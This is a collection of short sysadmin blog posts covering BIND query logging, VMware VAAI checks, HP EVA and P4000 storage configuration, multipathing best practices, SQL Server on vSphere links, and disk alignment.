Turn on BIND server logging to see queries

Q. How do I turn on DNS server logging so that I can see all the queries on my Fedora 14 server?

A. You can use the rndc command, which controls the operation of a name server. It supersedes the ndc utility that was provided in older BIND releases. If rndc is invoked without command-line options or arguments, it prints a short summary of the supported commands and the available options and their arguments.

rndc communicates with the name server over a TCP connection, sending commands authenticated with digital signatures.

Task: Turn on logging

Type the following command as root to toggle query logging:
# rndc querylog

Task: View bind server query log

Once this is done, you can view all logged queries in the /var/log/messages file. To follow them as they come in, type:
# tail -f /var/log/messages

Task: Turn off logging

Type the following command as root to toggle query logging:
# rndc querylog
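If you would rather keep queries out of /var/log/messages, BIND can also log them to a dedicated file. A minimal sketch of a logging stanza for named.conf (the channel name, file path, size and version count are assumptions, adjust them to your setup):

```
logging {
    // hypothetical channel name and path -- pick your own
    channel querylog {
        file "/var/log/named/query.log" versions 3 size 10m;
        severity info;
        print-time yes;
    };
    category queries { querylog; };
};
```

After editing named.conf, reload the configuration with rndc reload, and make sure the log directory is writable by the named user.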

How do I know if VAAI is enabled on ESX/ESXi?

To determine if VAAI is enabled within ESX/ESXi:

  • In the vSphere Client inventory panel, select the host.
  • Click the Configuration tab, and click Advanced Settings under Software.
  • Check that these options are set to 1 (enabled):
      DataMover/HardwareAcceleratedMove
      DataMover/HardwareAcceleratedInit
      VMFS3/HardwareAcceleratedLocking

Note: These options are enabled by default.

To determine if VAAI is enabled from the service console in ESX or the RCLI in ESXi, run the following commands and ensure that the value is 1:

# esxcfg-advcfg -g /DataMover/HardwareAcceleratedMove
# esxcfg-advcfg -g /DataMover/HardwareAcceleratedInit
# esxcfg-advcfg -g /VMFS3/HardwareAcceleratedLocking
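The three checks above can be combined in one loop (to be run on the ESX service console or via the RCLI, where esxcfg-advcfg is available; this is a sketch, not tested on every ESX version):

```
# List the current value of each VAAI-related option (each should report 1)
for opt in /DataMover/HardwareAcceleratedMove \
           /DataMover/HardwareAcceleratedInit \
           /VMFS3/HardwareAcceleratedLocking ; do
    esxcfg-advcfg -g "$opt"
done
```

Should one of them report 0, it can be switched back on with esxcfg-advcfg -s 1 followed by the option name.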

Can I check the VAAI status from the command line?
To check VAAI status, run the command:

# esxcfg-scsidevs -l | egrep "Display Name:|VAAI Status:"

EVAPERF “Access to the host was NOT verified”

Sometimes I get this “nice” message from EVAperf when adding a new CV/EVA host to the access list:

c:\Program Files\Hewlett-Packard\EVA Performance Monitor>evaperf fnh 127.0.0.1 <username>
Access to the host was NOT verified
Host: 127.0.0.1 not added to the list

The same happens when changing 127.0.0.1 to localhost or to the IP address of the host.

It turns out that using the FQDN (fully qualified domain name) of the host fixes the issue.
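So, with a placeholder FQDN (evahost.example.com stands in for your own host name), the working command looks like this:

```
c:\Program Files\Hewlett-Packard\EVA Performance Monitor>evaperf fnh evahost.example.com <username>
```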

EVA VAAI compliant?

Questions I often get are:

Is the EVA VAAI compliant?
The EVA will become “vStorage APIs for Array Integration” (VAAI for short) compliant, but it is NOT compliant at the moment.

Will it be in the next firmware release? Probably NOT.

The one after that… Probably YES. So we will have to wait, but until then the EVA should be fast enough on its own.

More information when available.

Quick install applications

Are you also getting tired of installing the same applications over and over in new installations (like Google Chrome, Java, etc.)?

Take a look at http://ninite.com

Select the applications you want to install from the list. You will get a downloadable executable that fully automatically installs the chosen apps. Versions you have already installed by hand will be skipped.

A “Poor man’s SAN” for ESX vSphere with VSA

While thinking about how to build a “Poor man’s SAN”, I came up with this idea:

Take 2 servers with enough disk space available and the ability to expand when needed. Install ESXi vSphere on both systems. Then, on each ESX host, create a VM running the VSA you can buy from HP.
The VSA is the same software that runs on HP’s P4000, but now running inside your vSphere environment. The licenses go up to 10TB.
With a VSA on both ESX hosts, you can set up your SAN/iQ management environment and your (first) cluster.

Make sure you have enough managers running to keep your data available in case one of your ESX hosts dies.

Now you have created your own iSCSI “P4000” like SAN. You can now connect to it from your production ESX vSphere environment.

One thing: support from HP is NOT included.
(drawing will follow)

Best practices for HP EVA, vSphere 4 and Round Robin multi-pathing

VMware vSphere and the HP EVA 4x00, 6x00 and 8x00 series are ALUA compliant. In simple terms, ALUA compliance means there is no need to manually identify preferred I/O paths between VMware ESX hosts and the storage controllers.

When you create a new Vdisk on the HP EVA, the LUN is set to No Preference by default. The No Preference policy means the following:

– Controller ownership is non-deterministic. The unit ownership is alternated between controllers during initial presentation or when controllers are restarted
– On controller failover (owning controller fails), the units are owned by the surviving controller
– On controller failback (previous owning controller returns), the units remain on the surviving controller. No failback occurs unless explicitly triggered.

To get a good distribution between the controllers, the following VDisk policies can be used:

Path A-Failover/failback
– At presentation, the units are brought online to controller A
– On controller failover, the units are owned by the surviving controller B
– On controller failback, the units are brought online on controller A implicitly

Path B-Failover/failback
– At presentation, the units are brought online to controller B
– On controller failover, the units are owned by surviving controller A
– On controller failback, the units are brought online on controller B implicitly

In VMware vSphere the Most Recently Used (MRU) and Round Robin (RR) multi-pathing policies are ALUA compliant. Round Robin load balancing is now officially supported. These multi-path policies have the following characteristics:

MRU:
– Will give preference to an optimal path to the LUN
– When all optimal paths are unavailable, it will use a non-optimal path
– When an optimal path becomes available, it will failover to the optimal
– Although each ESX server may use a different port through the optimal controller to the LUN, only a single controller port is used for LUN access per ESX server

Round Robin:
– Will queue I/O to LUNs on all ports of the owning controllers in a round robin fashion providing instant bandwidth improvement
– Will continue queuing I/O in a round robin fashion to optimal controller ports until none are available and will failover to the non-optimal paths
– Once an optimal path returns it will failback to it
– Can be configured to round robin I/O to all controller ports for a LUN by ignoring optimal path preference. (May be suitable for a write intensive environment due to increased controller port bandwidth)

The Fixed multi-path policy is not ALUA compliant and is therefore not recommended.

Another HP best practice is to set the IOPS value (default: 1000) to 1 for every LUN, using the following command:

for i in `ls /vmfs/devices/disks/ | grep naa.600` ;
do esxcli nmp roundrobin setconfig --type "iops" --iops=1 --device $i ; done

There is a bug where, after rebooting the VMware ESX server, the IOPS value reverts to a random value.
To check the IOPS values on all LUNs use the following command:

for i in `ls /vmfs/devices/disks/ | grep naa.600` ;
do esxcli nmp roundrobin getconfig --device $i ; done

To work around this IOPS bug, edit the /etc/rc.local file on every VMware ESX host and add the IOPS=1 command there. The rc.local file is executed after all init scripts have run.
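For example, the end of /etc/rc.local could re-apply the setting with the same loop used for the initial configuration (a sketch; verify the device naming on your own hosts before relying on it):

```
# /etc/rc.local -- re-apply IOPS=1 to all EVA LUNs after every reboot
for i in `ls /vmfs/devices/disks/ | grep naa.600` ;
do esxcli nmp roundrobin setconfig --type "iops" --iops=1 --device $i ; done
```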

The reason for the IOPS=1 recommendation is that during lab tests within HP, this setting showed a nice, even distribution of I/Os across all EVA ports used. If you experiment with it, you will see that the queue depth and the throughput for all EVA ports stay very even. With these workloads there was also a noticeably better overall performance.

Best practices are never a “one recommendation fits all” case.

VAAI support with SAN/iQ 9.0 on P4000

SAN/iQ for the P4000 now supports the VMware VAAI vStorage offloads (Full Copy, Block Zeroing, and Hardware Assisted Locking) for faster VM deployment and less load on the ESX server.

Meaning more VMs can run in the same environment. Up to SAN/iQ 8.1 it was recommended to run a total of 16 VMs; now up to 50 VMs should be supported. I have not been able to test this theory, but it is what HP states at the moment.

To upgrade to SAN/iQ 9.0, your system must already be running SAN/iQ 8.1.

SQL on vSphere link collection

VMware released some whitepapers about running MS SQL Server on VMware vSphere.

The VMware communities site has a spot called VIOPS where you can see posts from members in the community about recently posted documents. There are some nice documents available about virtualizing SQL server 2008 on vSphere 4.1.

There are a couple on SQL Server: for each product a “best practices” document and an “availability and recovery options” document.

Microsoft SQL Server on VMware – Best Practices Guide

Microsoft SQL Server on VMware – Availability and Recovery Options

Performance and Scalability of Microsoft® SQL Server® on VMware vSphere™ 4

Design, Deploy & Optimize SQL Server on vSphere

Disk alignment

Disk alignment is important in every operating system environment, but when you are using a SAN together with VMware you should especially take disk alignment into account.

In the worst case, the Guest OS (for example Windows) is not aligned with the VMFS, and the VMFS is not aligned with the array blocks. A single I/O from the guest can then result in 3 I/Os on the storage device.

With the VMFS aligned but the Guest OS still unaligned, an I/O can still result in 2 I/Os on the storage device. Better, but performance can still be improved.

When all file systems are aligned, one I/O results in exactly 1 I/O, because all block boundaries start at the same position.

Windows Vista and Windows 2008 avoid this automatically by aligning new partitions by default; on Windows XP you have to align the partition yourself.
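On Windows XP the alignment can be done by hand with diskpart before formatting the disk (a sketch; the align parameter requires the diskpart version shipped with Windows Server 2003 SP1 or later, and disk 1 is just an example target):

```
diskpart
DISKPART> select disk 1
DISKPART> create partition primary align=1024
```

align=1024 creates the partition on a 1024 KB boundary, which lines up with common array block sizes.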
